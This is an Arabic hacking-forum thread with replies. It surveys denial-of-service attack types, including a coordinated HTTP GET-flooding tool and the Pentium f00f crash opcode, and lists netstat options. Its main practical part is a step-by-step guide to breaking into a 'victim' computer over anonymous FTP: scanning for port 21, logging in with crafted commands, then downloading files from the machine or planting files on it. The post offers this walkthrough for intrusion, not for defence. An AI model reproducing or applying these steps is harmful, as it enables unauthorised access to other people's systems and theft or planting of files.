السلام عليكم ورحة الله وبركاته الدرس طويل شوي مشان هيك سنبدا على بركة الله يوجد العديد من أنواع الهجوم DOS سوف أحاول أن أسردها باختصار: 1-استهلاك عرض الحزمة Baud rate consumption حيث يقوم المهاجم باستهلاك كامل عرض الحزمة في نظام شبكة الضحية وذلك باغراق شبكة الضحية بكمية هائلة من الطلبات مثل: GET, SYN... وغيرها، مما يؤدي إلى استهلاك كامل عرض الحزمة وإيقاف الموقع المستهدف أو النظام المهاجم تماماً عن العمل، ويكون ذلك إما بالهجوم مباشرة Direct Attack حيث ينتصر في هذه الحالة من لديه عرض حزمة أكبر ( مثلاً 56-Kbps في مواجهة 128-Kbps )، أو القيام بربط العديد من المواقع من أجل إغراق نظام الضحية حيث يقوم المهاجم باستخدام أنظمة البث broadcast في شبكات أخرى من أجل تضخيم الهجوم، ويستفيد في هذه الحالة من عرض حزمة تلك الشبكة. من الجدير بالذكر في هذا الصدد أن برنامج الدرة من عمران يستخدم هذا النمط من الهجوم، على الرغم من أنني لم أقم بعد بتحليله كاملاً بعد، إلا أنني أستطيع القول من التحليل المبدئي على أنه يقوم بارسال طلبات GET حسب بروتوكول HTTP إلى النظام المستهدف وهو في هذه الحالة Web server مما يؤدي إلى زيادة الحمل على المزود المستهدف، يقوم البرنامج بذلك عن طريق إنشاء عدة Threads تعمل كل منها على أنها Process مستقلة تقوم بارسال طلبات GET المذكورة، إن فعالية هذا الهجوم قليلة حيث أن المستخدم مهما استخدم من عرض الحزمة لديه فلن يتمكن أبدا من مجاراة عرض حزمة المواقع الكبيرة، إلا أن القوة الحقيقية تكون عند التنسيق بين المئات أو الآلاف من مستخدمي هذا البرنامج بحيث يتم الهجوم على هدف محدد في وقت معين بدقة، وهذا مايقوم به برنامج الدرة حيث أنه يقوم بالاتصال بالموقع xxxxx.xxx (الموقع ليس سريا ويمكن بسهولة معرفته إلا أنني لن أذكره إلا إذا رغب عمران بذلك) ويحصل منه على أهداف الهجوم، ثم يقوم بالهجوم. (شكرا لـ Sp@nder على تزودي بنسخة من برنامج الدرة). 2-استهلاك الموارد: هذا النوع من الهجوم يعتمد على استهلاك الموارد في نظام الضحية عوضا عن استهلاك عرض الحزمة. أهم الموارد التي يتم استهدافها هي: CPU, Memory, Kernel, File system ... وغيرها، و يؤدي انخفاض الموارد في النظام إلى عدم استقراره وانهياره في نهاية الأمر. 3- الثغرات البرمجية أو في مكونات النظام: لا يوجد نظام أو برنامج خالي تماماً من الثغرات مهما بلغت دقة تصميمه، يوجد عدة طرق لاستغلال هذه الثغرات مثلا بارسال Packets غير متوفقة مع المعايير القياسية لـ بروتركول TCP/IP المحددة من قبل RFC إلى نظام الضحية مما يؤدي إلى نتائج تختلف حسب نوع البرنامج من توقف الخدمة، أو توقف النظام، أو ضياع المعلومات، أو فيضان المكدس stack وغير ذلك. والأسوأ من هذا استخدام الثغرات الموجودة ضمن المكونات الصلبة للنظام Hardware مثل ثغرة Pentium f00f DOS الشهيرة، حيث يؤدي تنفيذ شفرة الآلة opcode التالية 0xf00fc7c8 على أنظمة تعتمد معالجات بنتيوم إلى توقف النظام عن العمل تماماً. لسوء الحظ لا يمكن الكشف عن هذا النوع من الثغرات إلا بعد وقوع الهجوم. ولا أحد يعلم تماماً فيما إن كانت هذه الثغرات موجودة عن طريق الخطأ أم أنها موضوعة هناك عن عمد لسبب ما...... ؟؟؟؟؟!!!!!!! الله أعلم كما يوجد أنواع أخرى من هجمات DOS إلا أنها أقل فعالية وغير مستخدمة على نطاق واسع. كنت أنوي أن أتحدث عن طرق الحماية من هجوم رفض الخدمة إلا أن الموضوع طويل ويحتاج إلى عدة مقالات لمناقشته، إلا أن المهم بالنسبة للمستخدم المنزلي هو إخفاء رقم IP الخاص به واستخدام أحد برامج الجدران النارية مثل ZoneAlarm, PcConseal ...وغيرها، وطبعا أخذ الحذر في مواقع المنتديات والدردشة وخاصة منتدى الشبكات والسيرفرات في موقع فلاشيات ;-) مايتطسع فعله netstat NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة درس مهم لتعلم الاختراق بالtelnet http://www.nor2000.com/telnet.htm درس مهم لتعلم الاختراق بالnetbios http://www.nor2000.com/Logon.htm FTP أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت 21 مفتوح و هو البورت الخاص بــ FTP و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها Superscanne بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي إضغط على Start ثم Run ثم اكتب ftp –n تطلع لك نافدة في الدوس مكتوب عليها FTP&g لحد هنا كل شيء تمام و بعدين اكتب Open ثم إضغط على إدخال Enter تتحصل عب النتيجة التالية FTP&g To أكتب جنب To رقم IP الضحية ثم إضغط على إدخال و الحين اهم جزء إدا تحصلت على هذا الرد فقد تخطيت خطوة Connected http://www.assassin.com/ 220 websrv1 Microsoft FTP Service (Version 4.0). و الآن أكتب الكتابة التالية ftp&gquote user ftp إدا تحصلت على هذا الرد فقد تخطيت خطوة 331 Anonymous acces allowed, send identify (e-mail name) as password. و الآن أكتب الكتابة التالية ftp&gquote cwd ~root إدا تحصلت على هذا الرد فقد تخطيت خطوة 530 Please login with USER and PASS ثم أكتب الكتابة التالية ftp&gquote pass ftp إدا تحصلت على هذا الرد فقد تخطيت خطوة و نجحت في الإقتحام يعني الاختراق 230 Anonymous user logged in. مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه ما عليك الآن الا ان تقوم بإستعمال اوامر الفتيبي و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق Pwd لكي تعر ما يحتويه الهارد ديسك Cd لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Ls لكي يتضح لك محتوى المجلد أو الهارد ديسك Get لكي تحمل الى سطح المكتب بتاع جهازك مثال Get black.exe Put العملية الع**ية ل Get يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في في جهاز الضحية مثال Put black.exe Clos لقطع الإتصال مع الضحية هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها Codes: Signification: 110 Restart marker reply. 120 Service ready in nnn minutes. (nnn est un temps) 125 Data connection already open; transfer starting. 150 File status oka about to open data connection. 200 Command okay. 202 Command not implemented, superfluous at this site. 211 System status, or system help reply. 212 Directory status. 213 File status. 214 Help message. 215 NAME system type. 220 Service ready for new user. 221 Service closing control connection. 225 Data connection open; no transfer in progress. 226 Closing data connection. 227 Entering passive mode (h1, h2, h3, h4, p1, p2). 230 User logged in, proceed. 250 Requested file action okay, completed. 257 "PATHNAME" created. 331 User name okay, need password. 332 Need account for login. 350 Requested file action pendingfurther information. 421 Service not available, closing control connection. 425 Can't open data connection. 426 Connection closed; transfer aborded. 450 Requested file action not taken. (Fichier déjà utilisé par autre chose) 451 Requested action aborded: local error processing. 452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action) 500 Syntax error, command unrecognized. 501 Syntax error in parameters or arguments. 502 Command not implemented. 503 Bad sequence of commands. 504 Command not implemented for that parameter. 530 Not logged in. 532 Need account for storing files. 550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...) 551 Requested action aborded: page type unknown. 552 Requested file action aborded. 553 Requested action not taken. (Nom de fichier non attribué). يتبع في الصفحة الجاية . [img]file:///D:/هاكرز/معلومات/الاختراق%20عن%20طريق%20الدوس(2) %20-%20Powered%20by%20VBZooM_files/s8.gif[/img]
(&the$hatreck@>><<% (ان كان شعارك العفو عند المقدرة) (فأنا شعاري أني لا أعذر للخطيئة)
و منكم نستفيد, مشكور
مشكووور أخي بارك الله فيك
فايس بوك
مشكور بارك الله فيك
معهد شموخ العرب لتطوير وبرمجة المنتديات
مشكور يا غالي
شكرآ لك لاكن ينقصك التنسيق طريقة قديمة اخي لاكن شكرآ لك على الطرح -------------------------- بالتوفيق
دورة الفايروسات الدرس الاول من هنا الدرس الثاني من هنا الدرس الثالث الدرس الرابع + كشف التلغيم الدرس الخامس facebook
شكرا اخي بارك الله فيك موضوع يفيد اكثر من يريد ان يعرف كيف كان يتم الاختراق عن طريق الدوس و كذلك الاوامر التي تساعده في ذلك شكرا موفق .. ..
تـــابع الـدورةhttp://www.aljyyosh.com/vb/showthread.php?t=44469
شكرا لك اخى مبدع لك جزير الشكر
boda@hackers
قوانين المنتدى